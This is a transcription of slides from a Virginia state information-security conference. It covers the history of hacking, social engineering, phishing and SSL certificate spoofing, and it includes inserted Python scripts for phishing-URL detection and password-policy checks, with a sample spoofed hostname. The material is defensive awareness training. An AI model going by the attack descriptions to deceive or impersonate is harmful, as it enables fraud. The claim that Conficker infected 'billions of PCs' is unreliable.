Updated: 3:51 p.m. ET Feb. 28, 2005

T-Mobile said the company's computer forensics and security team were "actively investigating to determine how Ms. Hilton's information was obtained."

"We were shocked by mobile voicemail vulnerability," he said. "This is not about (cell phone) operator bashing. This is about generating attention. They knew this and haven't generated any action."

Page 96: First Annual Commonwealth Information Security Conference .

The Twisted Mind…

• Smart phones and PDA’s have become the electronic equivalent of the sticky note
  – Put my passwords in the device
• What if I drain your battery?

Page 97: First Annual Commonwealth Information Security Conference .

Virtualization

• Use it to check for unintended consequences
• Build test systems then apply Schneier’s rule to them
• Let’s see a demo…..

Page 98: First Annual Commonwealth Information Security Conference .

Should We Give Up?

• NO! But examine solutions carefully to make sure you don’t introduce a worse threat
• Knee-jerk solutions cause worse problems
• Apply Schneier’s rules to your solution

Page 99: First Annual Commonwealth Information Security Conference .

Should We Give Up?

• NO! Hold vendors accountable for their bad security practices

– Insecure code

– Stolen developer laptop syndrome

– They modify their EULA

– We just don’t buy the product….

Page 100: First Annual Commonwealth Information Security Conference .

Should We Give Up?

• NO! Increase User Awareness training.

• Customize it. What makes sense at VT might not make sense in your house.

• Helps your overall security posture.

• If we do security for the end user, they’ll never change their behavior.

• All security is local….

– A Tip O’Neill twist

Page 101: First Annual Commonwealth Information Security Conference .

Questions?

• Randy Marchany, VA Tech IT Security Office & Lab, 1300 Torgersen Hall, VA Tech, Blacksburg, VA 24060

• 540-231-9523

• [email protected]

• http://security.vt.edu

Page 102: First Annual Commonwealth Information Security Conference .

Eric Taylor

Enterprise Security Architect – Northrop Grumman

Page 103: First Annual Commonwealth Information Security Conference .

Introduction

• Evolution of computer attacks

• The Commonwealth over the last year

• How Do We Avoid Security Violations

Page 119: First Annual Commonwealth Information Security Conference .

• No such thing as a “secure” system

• Security is hard, but the basics are easy and still need attention.

• Attacks are not always technical; non-technical means can be used.

• Attacks take the path of least resistance.

Page 120: First Annual Commonwealth Information Security Conference .

Hacking for Fun (1970 – 1995)

• The goal was to gain access

• Motivation was mainly curiosity

• Methods: phreakers, password guessing, bad configurations, virus, trojan horses, insecure networks.

• Lessons Learned

▪ New Laws: Congress passes the Computer Fraud and Abuse Act

Page 121: First Annual Commonwealth Information Security Conference .

Casual Hacking (1995 – 2000)

• The goal was to gain access, defacement, disruption.

• The motivation was “showing off”, education, publicity and money.

• Methods: buffer overflows, email virus/attachments, AOHell, Back Orifice

• Lessons Learned

▪ There is a need for compromise detection (intrusion detection)

▪ Software security through better tools and languages

Page 122: First Annual Commonwealth Information Security Conference .

Hacking (2001 – 2005)

• The goal was to attract attention through large-scale activities.

• Motivation: publicity and money

• Methods: DoS, worms, rootkits, etc.

• Lessons Learned

▪ Service Denied

▪ Bill Gates decrees that Microsoft will secure its products and services, and kicks off a massive internal training and quality control campaign.

Page 123: First Annual Commonwealth Information Security Conference .

Professional hacking (2005 – ??)

• The goal: system compromise, identity theft, information exfiltration, and Advanced Persistent Threat (APT)

• Motivation is $$$

• Methods: web attacks, phishing / pharming, spear-phishing, etc.

▪ Malware, drive-by downloads, FakeAV

▪ Large-scale botnets, hacker “service” networks

▪ Conficker worm infiltrated billions of PCs worldwide

Page 124: First Annual Commonwealth Information Security Conference .

Malware / Worms

• Over a three month period, 1335 total unique infections (FakeAV and others)

▪ Conficker

▪ FakeAV

Mobile Devices

• USB drives

▪ Lost flash drives

▪ Conficker

• Stolen or lost laptops

Unsecure configurations

• Systems not locked down before production

Page 125: First Annual Commonwealth Information Security Conference .

Information leakage

• Posting sensitive information to a public website

• Human error

Application Security

• According to the Privacy Clearinghouse, in one incident in 2009 Virginia provided individual notifications to 530,000 people

• 530,000 x $.50 = $265,000 (estimate for stamps and envelopes)

Social Engineering

• Spear phishing of user accounts throughout the Commonwealth

Page 126: First Annual Commonwealth Information Security Conference .

Malware

• 66% over the last year

Major Outages

Unauthorized Access Attempts

• 3 instances of Virginia agencies in 2009 appear on the Privacy Clearinghouse “A Chronology of Data Breaches” website.

Page 127: First Annual Commonwealth Information Security Conference .

Charlie 16 to dispatch, we are currently 10-8 at the Stop and Rob on 2400 block of Jeff Davis.

Page 128: First Annual Commonwealth Information Security Conference .

[Diagram; labels: Developer, HTTP/HTTPS, Firewall, Application Logic, Access Control, DATA]

Page 129: First Annual Commonwealth Information Security Conference .

[Diagram; labels: Developer, Bad Guy, Firewall, Application Logic, Access Control, DATA]

Charlie 16 to dispatch, we are currently 10-8 at the Stop and Rob on 2400 block of Jeff Davis.

Page 130: First Annual Commonwealth Information Security Conference .

20 Critical Controls, prioritized baseline of information security measures and controls*

• Boundary Defense

• Avoiding Insecure Network Designs

• Patch Management

• User Awareness

• Least Privilege

• End Point or Client Side Security

* NOTE - SANS 20 Critical Security Controls - Version 2.1

Page 131: First Annual Commonwealth Information Security Conference .

• Secure SDLC Processes

• Security As Weighted Factor During the Procurement Process

• Application Security

• Security Skill Assessment and Appropriate Training

Page 132: First Annual Commonwealth Information Security Conference .

• We are still learning our lessons

• Attackers are more advanced than ever before

• Security must start from the beginning

• The Commonwealth is a target

Page 133: First Annual Commonwealth Information Security Conference .

Social Engineering: Building Bridges to Confidential Data

Bob Baskette, CISSP-ISSAP, CCNP/CCDP, RHCT

Commonwealth Security Architect

www.vita.virginia.gov

Page 134: First Annual Commonwealth Information Security Conference .

Why Information Security Matters

• Computer systems have an inherent value to both the computer system owner and those malicious individuals who seek the data stored on the computer systems and the available processing power the computer systems possess

• Malicious individuals may also be interested in taking over the computer system to store illegal materials or launch attacks that will be traced back to the compromised system instead of the malicious individual

Page 135: First Annual Commonwealth Information Security Conference .

Social Engineering

• The use of influence and persuasion to deceive people for the purpose of obtaining information or persuading a victim to perform some action

• Based on the building of inappropriate trust relationships

• Will target Help Desk personnel, onsite employees, and contractors

• Is one of the most potentially dangerous attacks since it does not directly target technology

Page 136: First Annual Commonwealth Information Security Conference .

Factors in Social Engineering

• Desire to be helpful

• Tendency to trust people

• Fear of getting in trouble

• Art of Manipulation (the ability to blend in)

Page 137: First Annual Commonwealth Information Security Conference .

Social Engineering Behavioral Types

• Scarcity

– Belief that an item is in short supply

– Commonly used by marketing

• Authority

– Based on premise of power

• Liking

– Based on the fact that people tend to help people they like

Page 138: First Annual Commonwealth Information Security Conference .

Social Engineering Behavioral Types

• Consistency

– Based on the fact that people like to be consistent

• Social Validation

– If one person does it, others will follow

• Reciprocation

– One good turn deserves another

Page 139: First Annual Commonwealth Information Security Conference .

Social Engineering Attack Types

• Human-based (Person-to-Person)

• Computer-Based (Automated)

Page 140: First Annual Commonwealth Information Security Conference .

Human-based (Person-to-Person)

• Uses the following techniques:

– Shoulder surfing

– Dumpster diving

– Impersonation

– Intimidation

– Using third-party approval

Page 141: First Annual Commonwealth Information Security Conference .

Human-based (Person-to-Person)

• Impersonation (Masquerading)

– Attacker pretends to be someone else

– Can impersonate a new employee, valid user, business client, janitor, delivery person, or mail room person

– Attack carries a higher risk since the attacker is inside the facility perimeter

• Intimidation (Posing as an important user)

– Attacker pretends to be an important user

– Works on the belief that it is not good to question authority

• Using third-person authorization

– Attacker convinces the victim that the attacker has approval from a third party that is an authoritative source

– Works on the belief that most people are good and truthful

Page 142: First Annual Commonwealth Information Security Conference .

Human-based (Person-to-Person)

• Reverse Social Engineering

– Considered to be the most difficult type of Social Engineering attack

– Requires a tremendous amount of preparation and skill

– Act as help-desk or admin staff to request information

– Can involve sabotaging the victim’s equipment and then offering to fix the problem

– Can be difficult to execute since the first step requires the sabotage of a system

– Target could be an external utility such as a phone line

– Deliver defective equipment and then offer to repair

• Attach business card to toner box or laptop case

Page 143: First Annual Commonwealth Information Security Conference .

Computer-Based (Automated)

• Phishing and Spam

• Email attachments

• Fake websites

• Pop-up messages

• Drive-by downloads

• DNS Cache poisoning

• Spoofed SSL-certificates

Page 144: First Annual Commonwealth Information Security Conference .

SPAM and the Flying Circus

• Spam is the intentional abuse or misuse of electronic messaging systems to send unsolicited bulk messages

• SPAM is normally associated with e-mail spam, but can be used with other electronic transmission types such as instant messaging, Usenet newsgroups, Web search engines, blogs, mobile phone messaging, Internet forums, and fax transmissions

• SPAM remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, and it is difficult to hold senders accountable for their mass mailings

• Today, SPAM is increasingly sourced from “bot networks”. Many modern worms install a backdoor which allows the spammer access to the computer and use it for malicious purposes

• SPAM email-chains are still very popular, promising good fortune if the chain is not broken

Page 145: First Annual Commonwealth Information Security Conference .

Phishing Basics

• Phishing campaigns use either email or malicious web sites to solicit personal information from targeted individuals

• Attackers attempt to replicate the look and format of emails from reputable companies, government agencies, or financial institutions

• The Phishing messages appear to come from popular social networking sites, auction sites, online payment processors or IT Administrators to entice the unsuspecting public to respond

• Phishing campaigns that target specific categories or groups of users are known as Spear Phishing Campaigns

Page 146: First Annual Commonwealth Information Security Conference .

Phishing Basics

• People respond without thinking to things that seem important

• Email subject lines worded to create anxiety or self-doubt, such as “Do you trust her/him” or “Is she/he cheating on you”, usually entice immediate action

• Email with subjects such as “Your bank account has been suspended“ or “There is a problem with your bank account” will usually get instant attention and prompt most people to click on the listed URL to determine what has happened

Page 147: First Annual Commonwealth Information Security Conference .

Pop-up messages

• Can prompt victim for numerous types of information

• Can be very successful since the message appears to be a system message referencing loss of access or malicious software detection

• Has been used successfully to install malicious software under the pretense of removing malicious software

Page 148: First Annual Commonwealth Information Security Conference .

Drive-By Downloads

• Uses legitimate websites to infect end users

• The legitimate website is compromised by a malicious individual to add hidden frames, malicious URLs, or malicious scripts to the legitimate website

• The user’s browser retrieves the information associated with the malicious URL or script and becomes infected with malicious software

• ClickJacking = Use of hidden frames on web pages to entice the user into clicking on malicious URLs

Page 149: First Annual Commonwealth Information Security Conference .

DNS Cache Poisoning

• Uses DNS responses to redirect users to malicious websites

• Uses multiple techniques to load malicious IP-address information into legitimate DNS servers

• Removes the need to trick a user into visiting a malicious website since the malicious IP-address is provided by a legitimate DNS server

Page 150: First Annual Commonwealth Information Security Conference .

SSL Certificate Spoofing

• MD5 Hash Collision/Digital Signature transfer

– A vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites has been identified

– Utilizes a weakness in the MD5 cryptographic hash function to allow the construction of different messages with the same MD5 hash

– This vulnerability can be used to create a rogue Certification Authority (CA) certificate trusted by all common web browsers

– This rogue certificate can be used to impersonate any website on the Internet, including banking and e-commerce sites secured using the HTTPS protocol

Page 151: First Annual Commonwealth Information Security Conference .

SSL Certificate Spoofing/Piggybacking

• “Piggybacking” SSL Certificates

– Allows multiple phishing attacks on a single certificate

– A single compromised Web server with a valid SSL certificate can be used to host multiple phishing sites since visitors to the phishing sites erroneously believe that they have a secure connection with the original website

– Visitors could only detect the fake SSL certificate if they reviewed the certificate or had access to other visual indicators (secured with an extended validation SSL certificate)

Page 152: First Annual Commonwealth Information Security Conference .

SSL Certificate Spoofing/URL Obfuscation

• NULL character attack

– Convinces the end-user that a certificate has been issued to a different domain than the one to which it was actually issued

– The use of NULL characters provides the ability to put up a certificate on what appears to be the exact same domain name as the targeted site

– This technique utilizes a Man-in-the-Middle attack and uses the null-character certificate to create its false certificates as needed

• Leading zero attack

– Similar to the NULL Character attack

– The certificate will attach an invisible zero to the first hex character in the certificate

Page 153: First Annual Commonwealth Information Security Conference .

Social Engineering Mitigation Methods

• User Security Awareness and Training

• Policies

• Procedures

Page 154: First Annual Commonwealth Information Security Conference .

Security Awareness Training

• Increases the understanding of security and the threat of Social Engineering

• Training should occur during employee enrollment and at regular intervals

• Training could be outsourced to a third-party since many employees consider third-party input to be more important

Page 155: First Annual Commonwealth Information Security Conference .

Email Security Awareness Training

• The best mitigation mechanism for SPAM and Phishing emails is the delete button

• To mitigate the potential threat presented by a spam email campaign, it is recommended that you remind your users to never open attachments or click links contained in unsolicited email messages

• Advise them, if possible, to check with the person who supposedly sent the email to make sure that it is legitimate prior to opening any attachments

• Scan any attachments at the network perimeter as well as the desktop with anti-virus software before opening the attachment

• Never use the contact information provided on a web site connected directly to the email request

Page 156: First Annual Commonwealth Information Security Conference .

Email Security Awareness Training

• Also advise users not to reveal personal or financial information in an email, and not to respond to email solicitations for this information

• Always examine the URL of a web site. Malicious web sites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain extension such as .com vs. .net

• An additional step to help mitigate the risk of a phishing campaign is to limit the administrative rights of the local users through the implementation of the Least-Privileged best practice

• Only display functional/group email addresses on public websites to limit the amount of SPAM/Phishing emails sent to individuals
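The URL check above (a misspelled name or a swapped domain extension) and the NULL-character certificate check from the SSL Certificate Spoofing/URL Obfuscation slide can both be automated. The script below is an added example, not material from the presentation; TRUSTED_DOMAINS, the placeholder name examplebank.com and all sample inputs are constructed, and the "last N labels" notion of a registrable domain is a simplification (real deployments use the Public Suffix List).

```python
"""Host-name checks for phishing URLs and spoofed certificate names.

Added example (not from the presentation). Two checks the slides describe:
  1. a certificate subject hiding a NUL character, so that software which
     stops at the NUL displays the trusted name while the CA validated the
     attacker-controlled suffix;
  2. a URL whose host is a misspelling or a domain-extension swap of a
     name the organisation trusts (examplebank.com vs examplebank.net).
TRUSTED_DOMAINS and all sample inputs are constructed for the example.
"""
from urllib.parse import urlsplit

# Constructed for the example: names the organisation treats as legitimate.
# examplebank.com is a placeholder; vita.virginia.gov appears in the slides.
TRUSTED_DOMAINS = ("examplebank.com", "vita.virginia.gov")

# Edit distance at or below this (but not zero) is reported as a lookalike.
LOOKALIKE_DISTANCE = 2


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute); scores spelling
    variations such as examp1ebank.com against examplebank.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def check_hostname(host: str, trusted=TRUSTED_DOMAINS) -> str:
    """Classify a host name taken from a URL or a certificate subject.

    Returns one of: 'embedded-nul', 'ok', 'tld-swap', 'lookalike', 'unrelated'.
    """
    # A NUL never belongs in a host name. Test the raw string first so the
    # part after the NUL is not silently dropped the way a C string would be.
    if "\x00" in host:
        return "embedded-nul"
    host = host.lower().rstrip(".")
    labels = host.split(".")
    for t in trusted:
        if host == t or host.endswith("." + t):
            return "ok"                      # the name itself or a subdomain
    for t in trusted:
        # Trusted name used as a leading part of a longer, unrelated host,
        # e.g. www.examplebank.com.evil.example
        if host.startswith(t + ".") or ("." + t + ".") in host:
            return "lookalike"
        t_labels = t.split(".")
        tail = labels[-len(t_labels):]       # simplified registrable domain
        if len(tail) != len(t_labels):
            continue
        if tail[:-1] == t_labels[:-1] and tail[-1] != t_labels[-1]:
            return "tld-swap"                # same name, different extension
        if 0 < levenshtein(".".join(tail), t) <= LOOKALIKE_DISTANCE:
            return "lookalike"
    return "unrelated"


def check_url(url: str) -> str:
    """Pull the host out of a URL the way a mail gateway would, then classify it."""
    return check_hostname(urlsplit(url).hostname or "")


if __name__ == "__main__":
    # Constructed samples: what an awareness-training checker would report.
    for sample in ("https://secure.examplebank.com/login",
                   "https://examplebank.net/login",
                   "https://www.examp1ebank.com/login",
                   "https://www.example.org/"):
        print(f"{sample:45} {check_url(sample)}")
    spoofed = "www.examplebank.com\x00.attacker.example"
    print(repr(spoofed), check_hostname(spoofed))
```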

Page 157: First Annual Commonwealth Information Security Conference .

Physical Security Awareness Training

• Ensure all visitors are always escorted

– Remind employees not to allow “Piggy-Back” access

– Remind employees not to allow an unknown person to wander the facility

• Never allow a visitor, client, or other persons to simply connect a computer to the internal network without prior approval

Page 158: First Annual Commonwealth Information Security Conference .

Credential Security Awareness Training

• Protection of account credentials

– Never give out or share passwords

– Use strong passwords for any application requiring a login

– Use unique passwords for every application and avoid using the same password for similar applications

– Carefully consider the questions used to verify the user for automated password resets

– Most automated systems use a common set of questions for password reset, and the answers to these questions can be found in public records or on-line

• Place of birth, mother’s maiden name, and school information are available in public records

• Friends, color preference, hobbies, and pet information often found on Social Network sites

• Make of first car can be guessed based on purchasing trends

Page 159: First Annual Commonwealth Information Security Conference .

Identity Security Awareness Training

• Protection of Personal Identifiable Information within Social Networks

– Select your screen name carefully – do not include any information such as your name, age, sex, city, or employer

– Never post anything you would not want to have distributed publicly

– Never post personally identifying information such as: SSN, first and last name, address, driver’s license, telephone number and e-mail address

– When establishing your account, adjust your profile until you are comfortable with the amount of protection provided to maximize your security

Page 160: First Annual Commonwealth Information Security Conference .

Policies

• Must clarify information access controls

• Detail rules for setting up accounts

• Define access approval

• Define process for changing passwords

Page 161: First Annual Commonwealth Information Security Conference .

Policies

• Define policy for physical destruction of devices and media

– Hard Drives

– CD/DVDs

• Define physical control selection and implementation

– Locks

– Access controls

– How visitors are authorized and escorted

Page 162: First Annual Commonwealth Information Security Conference .

Employee Hiring and Termination Policies

• Hiring should include background checks, verifying educational records, and Non-Disclosure Agreements

• Termination should include exit interviews, review of NDA, suspension of network access, and checklist for equipment return

Page 163: First Annual Commonwealth Information Security Conference .

Help Desk Procedures

• Used to make sure that there is a standard procedure for employee verification

• Caller-ID or employee call-back can be used to verify the caller

• Can also use Cognitive Passwords

– Arcane information that only the user should know

Page 164: First Annual Commonwealth Information Security Conference .

Password Change Policy

• Require strong passwords

– Must not contain any part of the account name

– Must be at least 8 characters long

– Must contain at least three of the following four:

• Numbers

• Uppercase letters

• Lowercase letters

• Non-alphanumeric symbols

• Require password aging

• Prohibit password reuse
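The rules on this slide are concrete enough to enforce mechanically at password-change time. The script below is an added example, not the presenter's or VITA's code: the length, three-of-four and account-name rules come from the slide, while MAX_AGE_DAYS, the hash-based reuse check and the definition of a "part" of the account name (any fragment of three or more characters) are assumptions; every account name, password and stored hash is constructed.

```python
"""Password-change policy checks implementing the rules on the slide.

Added example (not from the presentation). Rules taken from the slide: no
part of the account name, at least 8 characters, at least three of the
four character classes, password aging, no reuse. MAX_AGE_DAYS,
MIN_PART_LEN and storing history as salted hashes are my assumptions; the
slide gives no values. All account names, passwords and hashes below are
constructed for the example.
"""
import hashlib
import hmac
import os
import re
from datetime import date

MIN_LENGTH = 8
MIN_CLASSES = 3          # "three of the four" character classes
MAX_AGE_DAYS = 90        # assumed aging interval; the slide only says "require aging"
MIN_PART_LEN = 3         # assumed: account-name fragments shorter than this are ignored
PBKDF2_ROUNDS = 100_000  # history is kept as salted hashes, never as plaintext


def character_classes(password: str) -> int:
    """Count how many of the four classes the slide lists are present."""
    return sum((
        any(c.isdigit() for c in password),      # numbers
        any(c.isupper() for c in password),      # uppercase letters
        any(c.islower() for c in password),      # lowercase letters
        any(not c.isalnum() for c in password),  # non-alphanumeric symbols
    ))


def contains_account_part(password: str, account: str) -> bool:
    """'Must not contain any part of the account name': split the account
    name on punctuation (john.smith -> john, smith) and look for each
    fragment, and for the whole name, case-insensitively."""
    pw = password.lower()
    parts = {p for p in re.split(r"[^a-z0-9]+", account.lower()) if len(p) >= MIN_PART_LEN}
    parts.add(account.lower())
    return any(p in pw for p in parts)


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'salthex$digesthex'."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${digest.hex()}"


def matches_stored(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate against one stored hash."""
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def check_password(password: str, account: str, history: list) -> list:
    """Return the list of policy violations; an empty list means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    if character_classes(password) < MIN_CLASSES:
        problems.append("needs 3 of 4 classes")
    if contains_account_part(password, account):
        problems.append("contains part of account name")
    if any(matches_stored(password, h) for h in history):   # "prohibit reuse"
        problems.append("reused")
    return problems


def password_expired(last_changed: date, today: date) -> bool:
    """Password aging: force a change once the password is MAX_AGE_DAYS old."""
    return (today - last_changed).days >= MAX_AGE_DAYS


if __name__ == "__main__":
    # Constructed sample: account "jsmith" with one previous password on file.
    history = [hash_password("Tr0ub4dor!")]
    for candidate in ("Tr0ub4dor!", "JSmith2009!", "correcthorsebattery", "Ab1!", "W1nter-Tr33s"):
        print(f"{candidate:22} {check_password(candidate, 'jsmith', history) or 'accepted'}")
    print("expired:", password_expired(date(2009, 8, 1), date(2009, 11, 2)))
```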

Page 165: First Annual Commonwealth Information Security Conference .

Employee Identification

• ID badges give a clear indication of authorized personnel

• Guests should also wear temporary ID badges

• Guests should be required to sign-in and sign-out

• Anyone without a badge should be questioned and escorted to the proper facility personnel

Page 166: First Annual Commonwealth Information Security Conference .

Privacy Policies

• Employees and customers have a certain expectation with regard to privacy

• The privacy policy should be posted on the public website

Page 167: First Annual Commonwealth Information Security Conference .

Laws and Regulations

• 4th Amendment to the United States Constitution

• Electronic Communications Privacy Act of 1986

– Protects email and voice communications

• HIPAA (Health Insurance Portability and Accountability Act)

• Family Education Rights and Privacy Act

– Privacy rights to students over 18

• European Union Privacy Law

– Protects personal data

Page 168: First Annual Commonwealth Information Security Conference .

Data Classification Systems

• Can help prevent Social Engineering

• Can be used to define what information is most critical

• Can be used to gain end-user compliance

• Governmental Information Classification System

– Designed to protect confidentiality of information

• Commercial Information Classification System

– Focused on the integrity of information

Page 169: First Annual Commonwealth Information Security Conference .

Governmental Information Classification System

• Unclassified

– Information is not sensitive and does not need to be protected

– The loss of information would not cause damage

• Confidential

– Information is sensitive and the disclosure could result in some damage

– Will require a safeguard against disclosure

• Secret

– Information that is classified as secret has a greater importance than confidential data

– Disclosure would result in serious damage

– May result in loss of significant scientific or technical development

• Top-Secret

– Information that requires the most protection

– Disclosure would be catastrophic

Page 170: First Annual Commonwealth Information Security Conference .

Commercial Information Classification System

• Public

– Similar to unclassified information

– Disclosure would not result in damage

• Sensitive

– Information requires controls to prevent the release to unauthorized parties

– Disclosure would result in some damage

• Private

– Information is primarily personal in nature

– Can include employee or medical records

• Confidential

– Information has the most sensitive rating

– Information is required to keep the company competitive

– The information should never be released

Page 171: First Annual Commonwealth Information Security Conference .

Commonwealth Security Information Resource Center

• http://www.csirc.vita.virginia.gov

• Two Main Goals

– Create a place to provide security information that is relative to the Commonwealth

• Includes security topics within the COV government

• Addresses topics for those with interests in the security community

– Citizens, businesses, other states, etc.

– Create a source for providing threat data to third parties

• Summary threat data for public viewing

• Detailed threat data available for appropriate parties

Page 172: First Annual Commonwealth Information Security Conference .

Security Information

• Types of information posted

– Security advisories

• Advisories affecting the Commonwealth government computing environment

– Phishing scams

• Attempts to gather information from users that will be useful for malicious activity

– Information security tips

• How to integrate security into daily activity

– News

• The latest news about information security that would be useful to the government and its constituents

– Threat data

• Information showing statistics about the top attackers targeting the Commonwealth.

Page 173: First Annual Commonwealth Information Security Conference .

Security Research URLs

Internet Storm Center: http://isc.sans.org/

SANS Reading Room: https://www.sans.org/reading_room/

OWASP: http://www.owasp.org/index.php/Main_Page

Security Focus: http://www.securityfocus.com/

US-CERT: http://www.us-cert.gov

Team Cymru: http://www.team-cymru.org/

Page 174: First Annual Commonwealth Information Security Conference .

Questions???

For more information, please contact:

[email protected]

For more information on topics discussed in this presentation:

[email protected]

Thank You!